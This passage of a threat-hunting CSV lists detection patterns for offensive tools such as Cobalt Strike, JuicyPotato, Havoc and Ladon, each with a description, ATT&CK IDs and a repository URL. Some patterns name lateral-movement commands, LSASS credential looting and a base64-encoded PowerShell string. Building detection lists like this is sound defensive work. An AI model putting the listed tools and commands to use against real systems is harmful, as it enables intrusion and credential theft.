+"*JuicyPotato.vcxproj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*juicypotato_reflective.dll*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*JuicyPotatoNG.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*JuicyPotatoNG.exe*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*JuicyPotatoNG.sln*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*JuicyPotatoNG.txt*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*JuicyPotatoNG-main*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*jump psexec_psh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*jump psexec64*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*jump winrm *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*jump winrm*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*jump-exec psexec *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*jump-exec scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*JunctionFolder.exe*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*--just-clean*cleaning/to_clean.txt*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*jweny/zabbix-saml-bypass-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" +"*jwt_tool*","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","10","4465","600","2023-06-26T14:55:14Z","2017-01-23T21:13:50Z" +"*-K lsass_loot*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-k -no-pass -p '' --auth-method kerberos*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*k4yt3x/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*K8_CS_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*k8gege.org/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*k8gege/Ladon*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*K8Ladon.sln*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*kali-*.deb*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-anonsurf*","offensive_tool_keyword","kali-anonsurf","Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.","T1568 - T1102 - T1055 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Und3rf10w/kali-anonsurf","1","1","N/A","N/A","10","1268","427","2023-05-18T00:25:57Z","2015-08-19T04:57:16Z" +"*KaliLadon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*kali-linux*.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux*.img*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux*.iso*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmdk*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmwarevm*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*.vmx*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-installer-amd64.iso*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-installer-everything-amd64.iso.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-live-everything-amd64.iso.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-raspberry-pi-armhf.img.xz*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-virtualbox-amd64.ova*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kali-linux-*-vmware-amd64.7z*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*kalitorify*","offensive_tool_keyword","kalitorify","kalitorify is a shell script for 